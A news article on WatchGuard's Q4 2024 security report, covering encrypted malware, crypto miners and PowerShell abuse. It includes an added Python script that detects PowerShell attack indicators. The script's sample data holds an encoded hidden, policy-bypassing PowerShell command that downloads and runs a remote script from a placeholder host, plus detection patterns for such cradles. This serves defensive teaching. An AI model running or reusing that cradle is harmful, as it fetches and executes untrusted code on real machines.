The latest Internet Security Report from WatchGuard Technologies confirms what many experts have been warning: network-based malware is hiding behind encryption, and its volume has skyrocketed by 94% in just three months. The data, corresponding to the fourth quarter of 2024, reveals a troubling reality for businesses and users: cyberattacks are becoming increasingly sophisticated, stealthy, and difficult to detect.
WatchGuard, a global provider of unified cybersecurity solutions, details that the use of evasive techniques and encrypted traffic has become the norm among attackers. As encrypted channels proliferate for legitimate reasons, they are also solidifying as the preferred avenue to propagate zero-day malware, crypto miners, and stealthy attacks on endpoints.
Smarter Malware, More Complex Detections
Traditional protection is no longer sufficient. The report shows a 315% jump in detections using IntelligentAV, WatchGuard’s machine learning engine designed to identify unknown variants and emerging threats. There were also notable increases in the APT Blocker (+74%) and Gateway AntiVirus (+6%) engines, making it clear that attacks are successfully evading first lines of defense and require more proactive and adaptive technologies.
“The current landscape demands constant vigilance and layered defenses. It’s no longer enough to prevent; you have to anticipate,” warns Corey Nachreiner, Chief Security Officer at WatchGuard. “Attackers combine old techniques with encryption, artificial intelligence, and the exploitation of legitimate system tools. This convergence requires a new way of understanding cybersecurity.”
Crypto Miners: The Silent Threat Growing by 141%
One of the most alarming data points in the report is the 141% increase in detections of crypto miners. Although cryptocurrency mining is legitimate in many cases, its malicious use — running hidden on devices the attacker does not own and without the user's consent — poses a growing threat, driven by the rise in value of cryptocurrencies like Bitcoin. This technique drains resources, degrades device performance, and can go unnoticed for weeks or months.
PowerShell Dominates Endpoint Attacks
In the endpoint analysis, the use of LotL (Living off the Land) techniques continues to grow. These tactics rely on legitimate system tools to execute attacks without the need for external malware, making them harder to detect. The report highlights that 83% of endpoint attacks used scripts or injections, and of these, a staggering 97% were executed via PowerShell, solidifying it as one of the most exploited vectors of the year.
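Defenders usually meet this at the telemetry layer. The following is an added example, not code from the WatchGuard report or from the article: a small triage routine over constructed PowerShell Script Block Logging (Event ID 4104) text that flags common LotL indicators, decodes -EncodedCommand payloads so obfuscated content is scored as well, and ranks the events. The indicator names, sample events and scoring threshold are assumptions for illustration.

```python
import base64
import re
from typing import Optional

# Heuristic indicators of PowerShell-based LotL activity as they appear in
# Script Block Logging (Event ID 4104) or command-line audit data. Each is a
# signal for triage, not proof of compromise. (Assumed names, not a vendor list.)
INDICATORS = {
    "encoded_command": re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I),
    "download_cradle": re.compile(r"(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I),
    "invoke_expression": re.compile(r"(?:\bIEX\b|Invoke-Expression)", re.I),
    "hidden_window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "no_profile": re.compile(r"-(?:nop|noprofile)\b", re.I),
}


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return it, or None if undecodable."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_script_block(text: str) -> dict:
    """Collect indicator hits for one script block, including those hidden in an encoded payload."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    match = INDICATORS["encoded_command"].search(text)
    decoded = decode_encoded_command(match.group(1)) if match else None
    if decoded:
        hits |= {n for n, rx in INDICATORS.items() if n != "encoded_command" and rx.search(decoded)}
    return {"indicators": sorted(hits), "decoded": decoded, "score": len(hits)}


def triage(events: list, threshold: int = 2) -> list:
    """Keep events whose indicator count reaches the threshold, highest score first."""
    flagged = [{"id": ev["id"], **analyze_script_block(ev["script"])} for ev in events]
    return sorted((r for r in flagged if r["score"] >= threshold), key=lambda r: -r["score"])


# Constructed sample 4104 script blocks (not real telemetry); the URLs use .invalid TLDs.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"id": 1, "script": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"id": 2, "script": f"powershell.exe -nop -w hidden -ep bypass -enc {_ENCODED}"},
    {"id": 3, "script": "Invoke-WebRequest https://updates.example.invalid/patch.msi -OutFile p.msi"},
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result["id"], result["score"], result["indicators"])
```

Event 3 is a single legitimate-looking download and stays below the threshold; event 2 scores on the raw command line alone, and decoding the payload adds the download cradle and Invoke-Expression hits that a plain-text match would miss.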
Less Volume, More Impact
Despite the increase in encrypted and sophisticated malware, the total volume of unique threats detected fell by 91%. That might seem positive, but the report cautions against reading it that way: fewer threats do not mean less danger. Attackers are opting for more targeted campaigns and more complex tools that can cause greater damage with less exposure.
Meanwhile, network attacks decreased by 27%, but many of the detected threats continue to exploit known vulnerabilities. This reinforces a key message: patching remains essential, and many attacks continue to succeed because basic gaps remain open.
Persistent Phishing and Basic Yet Effective Attacks
The list of domains used in phishing campaigns has barely changed from the previous quarter, suggesting that well-established fraudulent infrastructure remains active and effective. Many of these campaigns impersonate legitimate portals, especially SharePoint and Office 365, as part of Business Email Compromise (BEC) attacks.
Additionally, more than half of the top network detections corresponded to generic signatures that detect common vulnerabilities in web applications, signaling that attackers still rely on basic but massive strategies that seek to exploit known flaws with repetitive techniques.
Unified Cybersecurity, the Answer to a Changing Ecosystem
WatchGuard emphasizes the need for a unified approach. Its Unified Security Platform® is designed for managed service providers who need scalable, automated, and coordinated solutions. It combines network protection, advanced endpoint security, multifactor authentication, and secure Wi-Fi, all supported by shared intelligence and automation.
With over 250,000 customers worldwide and a network of more than 17,000 partners, the company underscores that collaboration and intelligence sharing are key to anticipating future threats.
Conclusion: Encryption is a Double-Edged Sword
Encryption protects privacy, but it also conceals increasingly aggressive threats. The takeaways from WatchGuard’s latest report are clear: attackers are adapting faster than ever, and the only way to keep pace is to combine advanced technology, shared intelligence, and a proactive, layered security strategy.
Source: Security News